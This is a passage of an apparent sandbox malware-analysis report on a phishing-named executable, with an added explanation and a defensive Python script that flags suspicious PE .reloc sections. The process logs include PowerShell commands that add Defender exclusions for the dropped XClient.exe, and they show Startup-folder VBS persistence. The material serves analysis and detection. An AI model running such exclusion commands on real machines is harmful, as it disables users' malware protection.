Source: rmiregistry.exe.3.dr Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: servertool.exe.3.dr Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: ssvagent.exe.3.dr Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: tnameserv.exe.3.dr Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: unpack200.exe.3.dr Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: ie_to_edge_stub.exe.3.dr Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: acrobat_sl.exe.3.dr Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: AcroBroker.exe.3.dr Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: AcroCEF.exe.3.dr Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: SingleClientServicesUpdater.exe.3.dr Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: cookie_exporter.exe.3.dr Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: identity_helper.exe.3.dr Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: setup.exe.3.dr Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
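The section-count lines (`Number of sections : N > 10`) and the long run of `.reloc` lines above are two static heuristics over the section table of the dropped files. They carry very different weight. A section count above ten is weak on its own, since large legitimate builds can exceed it. A `.reloc` section flagged `IMAGE_SCN_MEM_EXECUTE` and `IMAGE_SCN_MEM_WRITE` is not: `.reloc` normally holds discardable, read-only relocation data, so executable and writable code there is the classic mark of a file infector appending its body to an existing binary. That the flagged files are copies of Java, Adobe, 7-Zip, Mozilla, AutoIt and Chromium executables under Program Files, plus System32 service binaries (`alg.exe`, `AppVClient.exe`), matches the report's "Infects executable files" and "Drops executable to a common third party application directory" signatures; cleanup of such a host means reinstalling those products, not just deleting the dropper. The following audit, added here and not part of the Joe Sandbox report, reproduces both checks with the standard library; the PE images it runs on are constructed headers-only test inputs, not real files.

```python
"""Static PE section audit: reproduces two of the report's heuristics, the
section count exceeding 10 and a .reloc section marked both executable and
writable. Stdlib only; the test images below are constructed, not real files."""
import struct

# IMAGE_SECTION_HEADER.Characteristics flags, in the order the report prints them
FLAGS = {
    "IMAGE_SCN_CNT_INITIALIZED_DATA": 0x00000040,
    "IMAGE_SCN_MEM_DISCARDABLE":      0x02000000,
    "IMAGE_SCN_MEM_EXECUTE":          0x20000000,
    "IMAGE_SCN_MEM_READ":             0x40000000,
    "IMAGE_SCN_MEM_WRITE":            0x80000000,
}
SECTION_LIMIT = 10  # the report's "> 10" threshold


def parse_sections(data: bytes):
    """Walk the section table and return [(name, characteristics), ...]."""
    if data[:2] != b"MZ":
        raise ValueError("not a DOS/PE image")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    # IMAGE_FILE_HEADER follows the 4-byte signature: NumberOfSections sits at
    # signature + 6, SizeOfOptionalHeader at signature + 20
    num_sections = struct.unpack_from("<H", data, e_lfanew + 6)[0]
    size_opt = struct.unpack_from("<H", data, e_lfanew + 20)[0]
    table = e_lfanew + 24 + size_opt  # section table begins after the optional header
    sections = []
    for i in range(num_sections):
        # IMAGE_SECTION_HEADER is 40 bytes; Name first, Characteristics last
        fields = struct.unpack_from("<8sIIIIIIHHI", data, table + 40 * i)
        name = fields[0].rstrip(b"\0").decode("ascii", "replace")
        sections.append((name, fields[-1]))
    return sections


def flag_names(chars: int):
    return [n for n, v in FLAGS.items() if chars & v]


def audit(data: bytes) -> dict:
    """Return the section list plus findings phrased like the report's lines."""
    sections = parse_sections(data)
    findings = []
    if len(sections) > SECTION_LIMIT:
        findings.append(f"Number of sections : {len(sections)} > {SECTION_LIMIT}")
    for name, chars in sections:
        # .reloc should be discardable read-only data; executable + writable there
        # is the file-infector marker the report keys on
        if (name == ".reloc" and chars & FLAGS["IMAGE_SCN_MEM_EXECUTE"]
                and chars & FLAGS["IMAGE_SCN_MEM_WRITE"]):
            findings.append("Section: .reloc " + ", ".join(flag_names(chars)))
    return {"sections": sections, "findings": findings}


def build_pe(section_specs) -> bytes:
    """Construct a headers-only PE32 image (no code, no data) for testing."""
    e_lfanew = 0x40
    dos = bytearray(e_lfanew)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, e_lfanew)
    opt = struct.pack("<H", 0x10B) + bytes(222)  # PE32 magic, remainder zeroed
    file_hdr = struct.pack("<HHIIIHH", 0x14C, len(section_specs), 0, 0, 0, len(opt), 0x102)
    table = b"".join(
        struct.pack("<8sIIIIIIHHI", name, 0, 0, 0, 0, 0, 0, 0, 0, chars)
        for name, chars in section_specs
    )
    return bytes(dos) + b"PE\0\0" + file_hdr + opt + table


# Constructed samples: a normal four-section layout versus one with 13 sections
# and a .reloc carrying exactly the flag set the report lists
NORMAL_RELOC = (FLAGS["IMAGE_SCN_CNT_INITIALIZED_DATA"]
                | FLAGS["IMAGE_SCN_MEM_DISCARDABLE"] | FLAGS["IMAGE_SCN_MEM_READ"])
INFECTED_RELOC = NORMAL_RELOC | FLAGS["IMAGE_SCN_MEM_EXECUTE"] | FLAGS["IMAGE_SCN_MEM_WRITE"]
CLEAN = build_pe([(b".text", 0x60000020), (b".rdata", 0x40000040),
                  (b".data", 0xC0000040), (b".reloc", NORMAL_RELOC)])
SUSPECT = build_pe([(b".text", 0x60000020)]
                   + [(b".d%d" % i, 0xC0000040) for i in range(11)]
                   + [(b".reloc", INFECTED_RELOC)])

if __name__ == "__main__":
    for label, image in (("clean", CLEAN), ("suspect", SUSPECT)):
        print(label, audit(image)["findings"])
```

To run it over a real dropped file, pass `open(path, "rb").read()` to `audit()`; the `.reloc` finding reproduces the report's wording exactly, so it can be diffed against the lines above.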
Source: classification engine Classification label: mal100.spre.troj.spyw.expl.evad.winEXE@34/171@48/16
Source: C:\Users\user\Desktop\RFQ-ON736672-MATERIALS-SPECIFICATIONS-ORDER.exe Code function: 0_2_0046A06A GetLastError,FormatMessageW, 0_2_0046A06A
Source: C:\Users\user\Desktop\RFQ-ON736672-MATERIALS-SPECIFICATIONS-ORDER.exe Code function: 0_2_004581CB AdjustTokenPrivileges,CloseHandle, 0_2_004581CB
Source: C:\Users\user\Desktop\RFQ-ON736672-MATERIALS-SPECIFICATIONS-ORDER.exe Code function: 0_2_004587E1 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError, 0_2_004587E1
Source: C:\Users\user\Desktop\RFQ-ON736672-MATERIALS-SPECIFICATIONS-ORDER.exe Code function: 0_2_0046B333 SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode, 0_2_0046B333
Source: C:\Users\user\Desktop\RFQ-ON736672-MATERIALS-SPECIFICATIONS-ORDER.exe Code function: 0_2_0047EE0D CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle, 0_2_0047EE0D
Source: C:\Users\user\Desktop\RFQ-ON736672-MATERIALS-SPECIFICATIONS-ORDER.exe Code function: 0_2_0046C397 CoInitialize,CoCreateInstance,CoUninitialize, 0_2_0046C397
Source: C:\Users\user\Desktop\RFQ-ON736672-MATERIALS-SPECIFICATIONS-ORDER.exe Code function: 0_2_00404E89 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource, 0_2_00404E89
Source: C:\Users\user\Desktop\RFQ-ON736672-MATERIALS-SPECIFICATIONS-ORDER.exe Code function: 0_2_02FACBD0 StrStrIW,CloseHandle,StrStrIW,CloseServiceHandle,OpenServiceW,StrStrIW,_wcslen,ChangeServiceConfigW,StrStrIW,StrStrIW,CloseServiceHandle,CloseHandle,StartServiceW, 0_2_02FACBD0
Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe File created: C:\Program Files (x86)\Mozilla Maintenance Service\logs\maintenanceservice.log
Source: C:\Users\user\Desktop\RFQ-ON736672-MATERIALS-SPECIFICATIONS-ORDER.exe File created: C:\Users\user\AppData\Roaming\d225894719a6adcd.bin
Source: C:\Windows\SysWOW64\WerFault.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess8088
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3900:120:WilError_03
Source: C:\Windows\System32\alg.exe Mutant created: \BaseNamedObjects\Global\Multiarch.m0yv-d225894719a6adcd9ea72c54-b
Source: C:\Users\user\AppData\Roaming\XClient.exe Mutant created: NULL
Source: C:\Users\user\Desktop\RFQ-ON736672-MATERIALS-SPECIFICATIONS-ORDER.exe Mutant created: \Sessions\1\BaseNamedObjects\Global\Multiarch.m0yv-d225894719a6adcd-inf
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7752:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7756:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4012:120:WilError_03
Source: C:\Users\user\AppData\Local\antholite\exhilaratingly.exe Mutant created: \Sessions\1\BaseNamedObjects\Global\Multiarch.m0yv-d225894719a6adcdef280244-b
Source: C:\Users\user\AppData\Local\Temp\XClient.exe Mutant created: \Sessions\1\BaseNamedObjects\XoFHv1TT4hWErxRo
Source: C:\Users\user\Desktop\RFQ-ON736672-MATERIALS-SPECIFICATIONS-ORDER.exe File created: C:\Users\user\AppData\Local\Temp\aut1387.tmp
Source: unknown Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\exhilaratingly.vbs"
Source: C:\Users\user\AppData\Local\Temp\build.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
Source: C:\Users\user\AppData\Local\Temp\build.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId='1'
Source: C:\Users\user\AppData\Local\Temp\build.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File read: C:\Users\user\Desktop\desktop.ini
Source: C:\Users\user\Desktop\RFQ-ON736672-MATERIALS-SPECIFICATIONS-ORDER.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: build.exe, 00000006.00000002.1724819529.0000000002FA4000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.1724819529.0000000002EFE000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.1724819529.0000000002FBA000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.1724819529.0000000002F14000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: RFQ-ON736672-MATERIALS-SPECIFICATIONS-ORDER.exe Virustotal: Detection: 74%
Source: RFQ-ON736672-MATERIALS-SPECIFICATIONS-ORDER.exe ReversingLabs: Detection: 83%
Source: C:\Users\user\Desktop\RFQ-ON736672-MATERIALS-SPECIFICATIONS-ORDER.exe File read: C:\Users\user\Desktop\RFQ-ON736672-MATERIALS-SPECIFICATIONS-ORDER.exe
Source: unknown Process created: C:\Users\user\Desktop\RFQ-ON736672-MATERIALS-SPECIFICATIONS-ORDER.exe "C:\Users\user\Desktop\RFQ-ON736672-MATERIALS-SPECIFICATIONS-ORDER.exe"
Source: unknown Process created: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe "C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe"
Source: unknown Process created: C:\Windows\System32\alg.exe C:\Windows\System32\alg.exe
Source: C:\Users\user\Desktop\RFQ-ON736672-MATERIALS-SPECIFICATIONS-ORDER.exe Process created: C:\Users\user\AppData\Local\antholite\exhilaratingly.exe "C:\Users\user\Desktop\RFQ-ON736672-MATERIALS-SPECIFICATIONS-ORDER.exe"
Source: C:\Users\user\AppData\Local\antholite\exhilaratingly.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\Desktop\RFQ-ON736672-MATERIALS-SPECIFICATIONS-ORDER.exe"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process created: C:\Users\user\AppData\Local\Temp\build.exe "C:\Users\user\AppData\Local\Temp\build.exe"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process created: C:\Users\user\AppData\Local\Temp\XClient.exe "C:\Users\user\AppData\Local\Temp\XClient.exe"
Source: unknown Process created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.55\elevation_service.exe "C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.55\elevation_service.exe"
Source: unknown Process created: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe "C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe"
Source: C:\Users\user\AppData\Local\Temp\XClient.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\XClient.exe'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\exhilaratingly.vbs"
Source: C:\Windows\System32\wscript.exe Process created: C:\Users\user\AppData\Local\antholite\exhilaratingly.exe "C:\Users\user\AppData\Local\antholite\exhilaratingly.exe"
Source: C:\Users\user\AppData\Local\antholite\exhilaratingly.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\AppData\Local\antholite\exhilaratingly.exe"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 8088 -s 992
Source: C:\Users\user\AppData\Local\Temp\XClient.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'XClient.exe'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\XClient.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\XClient.exe'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\XClient.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'XClient.exe'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Users\user\AppData\Roaming\XClient.exe "C:\Users\user\AppData\Roaming\XClient.exe"
Source: unknown Process created: C:\Windows\System32\FXSSVC.exe C:\Windows\system32\fxssvc.exe
Source: C:\Users\user\Desktop\RFQ-ON736672-MATERIALS-SPECIFICATIONS-ORDER.exe Process created: C:\Users\user\AppData\Local\antholite\exhilaratingly.exe "C:\Users\user\Desktop\RFQ-ON736672-MATERIALS-SPECIFICATIONS-ORDER.exe"
Source: C:\Users\user\AppData\Local\antholite\exhilaratingly.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\Desktop\RFQ-ON736672-MATERIALS-SPECIFICATIONS-ORDER.exe"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process created: C:\Users\user\AppData\Local\Temp\build.exe "C:\Users\user\AppData\Local\Temp\build.exe"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process created: C:\Users\user\AppData\Local\Temp\XClient.exe "C:\Users\user\AppData\Local\Temp\XClient.exe"
Source: C:\Users\user\AppData\Local\Temp\XClient.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\XClient.exe'
Source: C:\Users\user\AppData\Local\Temp\XClient.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'XClient.exe'
Source: C:\Users\user\AppData\Local\Temp\XClient.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\XClient.exe'
Source: C:\Users\user\AppData\Local\Temp\XClient.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'XClient.exe'
Source: C:\Windows\System32\wscript.exe Process created: C:\Users\user\AppData\Local\antholite\exhilaratingly.exe "C:\Users\user\AppData\Local\antholite\exhilaratingly.exe"
Source: C:\Users\user\AppData\Local\antholite\exhilaratingly.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\AppData\Local\antholite\exhilaratingly.exe"
Source: C:\Users\user\Desktop\RFQ-ON736672-MATERIALS-SPECIFICATIONS-ORDER.exe Section loaded: wsock32.dll
Source: C:\Users\user\Desktop\RFQ-ON736672-MATERIALS-SPECIFICATIONS-ORDER.exe Section loaded: version.dll
Source: C:\Users\user\Desktop\RFQ-ON736672-MATERIALS-SPECIFICATIONS-ORDER.exe Section loaded: winmm.dll
Source: C:\Users\user\Desktop\RFQ-ON736672-MATERIALS-SPECIFICATIONS-ORDER.exe Section loaded: mpr.dll
Source: C:\Users\user\Desktop\RFQ-ON736672-MATERIALS-SPECIFICATIONS-ORDER.exe Section loaded: wininet.dll
Source: C:\Users\user\Desktop\RFQ-ON736672-MATERIALS-SPECIFICATIONS-ORDER.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\RFQ-ON736672-MATERIALS-SPECIFICATIONS-ORDER.exe Section loaded: userenv.dll
Source: C:\Users\user\Desktop\RFQ-ON736672-MATERIALS-SPECIFICATIONS-ORDER.exe Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\RFQ-ON736672-MATERIALS-SPECIFICATIONS-ORDER.exe Section loaded: winhttp.dll
Source: C:\Users\user\Desktop\RFQ-ON736672-MATERIALS-SPECIFICATIONS-ORDER.exe Section loaded: secur32.dll
Source: C:\Users\user\Desktop\RFQ-ON736672-MATERIALS-SPECIFICATIONS-ORDER.exe Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\RFQ-ON736672-MATERIALS-SPECIFICATIONS-ORDER.exe Section loaded: dnsapi.dll
Source: C:\Users\user\Desktop\RFQ-ON736672-MATERIALS-SPECIFICATIONS-ORDER.exe Section loaded: ntmarta.dll
Source: C:\Users\user\Desktop\RFQ-ON736672-MATERIALS-SPECIFICATIONS-ORDER.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\RFQ-ON736672-MATERIALS-SPECIFICATIONS-ORDER.exe Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\RFQ-ON736672-MATERIALS-SPECIFICATIONS-ORDER.exe Section loaded: wldp.dll
Source: C:\Users\user\Desktop\RFQ-ON736672-MATERIALS-SPECIFICATIONS-ORDER.exe Section loaded: cryptsp.dll
Source: C:\Users\user\Desktop\RFQ-ON736672-MATERIALS-SPECIFICATIONS-ORDER.exe Section loaded: rsaenh.dll
Source: C:\Users\user\Desktop\RFQ-ON736672-MATERIALS-SPECIFICATIONS-ORDER.exe Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\RFQ-ON736672-MATERIALS-SPECIFICATIONS-ORDER.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\RFQ-ON736672-MATERIALS-SPECIFICATIONS-ORDER.exe Section loaded: mswsock.dll
Source: C:\Users\user\Desktop\RFQ-ON736672-MATERIALS-SPECIFICATIONS-ORDER.exe Section loaded: winnsi.dll
Source: C:\Users\user\Desktop\RFQ-ON736672-MATERIALS-SPECIFICATIONS-ORDER.exe Section loaded: dhcpcsvc6.dll
Source: C:\Users\user\Desktop\RFQ-ON736672-MATERIALS-SPECIFICATIONS-ORDER.exe Section loaded: dhcpcsvc.dll
Source: C:\Users\user\Desktop\RFQ-ON736672-MATERIALS-SPECIFICATIONS-ORDER.exe Section loaded: webio.dll
Source: C:\Users\user\Desktop\RFQ-ON736672-MATERIALS-SPECIFICATIONS-ORDER.exe Section loaded: apphelp.dll
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\alg.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\alg.exe Section loaded: mswsock.dll
Source: C:\Windows\System32\alg.exe Section loaded: winhttp.dll
Source: C:\Windows\System32\alg.exe Section loaded: mpr.dll
Source: C:\Windows\System32\alg.exe Section loaded: secur32.dll
Source: C:\Windows\System32\alg.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\alg.exe Section loaded: dnsapi.dll
Source: C:\Windows\System32\alg.exe Section loaded: iphlpapi.dll
Source: C:\Windows\System32\alg.exe Section loaded: ntmarta.dll
Source: C:\Windows\System32\alg.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\alg.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\alg.exe Section loaded: winnsi.dll
Source: C:\Windows\System32\alg.exe Section loaded: dhcpcsvc6.dll
Source: C:\Windows\System32\alg.exe Section loaded: dhcpcsvc.dll
Source: C:\Windows\System32\alg.exe Section loaded: webio.dll
Source: C:\Windows\System32\alg.exe Section loaded: rasadhlp.dll
Source: C:\Windows\System32\alg.exe Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\alg.exe Section loaded: drprov.dll
Source: C:\Windows\System32\alg.exe Section loaded: winsta.dll
Source: C:\Windows\System32\alg.exe Section loaded: ntlanman.dll
Source: C:\Windows\System32\alg.exe Section loaded: davclnt.dll
Source: C:\Windows\System32\alg.exe Section loaded: davhlpr.dll
Source: C:\Windows\System32\alg.exe Section loaded: wkscli.dll
Source: C:\Windows\System32\alg.exe Section loaded: cscapi.dll
Source: C:\Windows\System32\alg.exe Section loaded: netutils.dll
Source: C:\Windows\System32\alg.exe Section loaded: browcli.dll
Source: C:\Users\user\AppData\Local\antholite\exhilaratingly.exe Section loaded: wsock32.dll
Source: C:\Users\user\AppData\Local\antholite\exhilaratingly.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Local\antholite\exhilaratingly.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\antholite\exhilaratingly.exe Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\antholite\exhilaratingly.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\antholite\exhilaratingly.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\antholite\exhilaratingly.exe Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\antholite\exhilaratingly.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\antholite\exhilaratingly.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\antholite\exhilaratingly.exe Section loaded: secur32.dll
Source: C:\Users\user\AppData\Local\antholite\exhilaratingly.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\antholite\exhilaratingly.exe Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\antholite\exhilaratingly.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\antholite\exhilaratingly.exe Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Local\antholite\exhilaratingly.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\antholite\exhilaratingly.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\antholite\exhilaratingly.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\antholite\exhilaratingly.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\antholite\exhilaratingly.exe Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\antholite\exhilaratingly.exe Section loaded: dhcpcsvc6.dll
Source: C:\Users\user\AppData\Local\antholite\exhilaratingly.exe Section loaded: dhcpcsvc.dll
Source: C:\Users\user\AppData\Local\antholite\exhilaratingly.exe Section loaded: webio.dll
Source: C:\Users\user\AppData\Local\Temp\build.exe Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\Temp\build.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\build.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\build.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\build.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\build.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\build.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\build.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\build.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\build.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\build.exe Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\build.exe Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\build.exe Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\build.exe Section loaded: dwrite.dll
Source: C:\Users\user\AppData\Local\Temp\build.exe Section loaded: msvcp140_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\build.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\build.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\build.exe Section loaded: secur32.dll
Source: C:\Users\user\AppData\Local\Temp\build.exe Section loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Local\Temp\build.exe Section loaded: amsi.dll
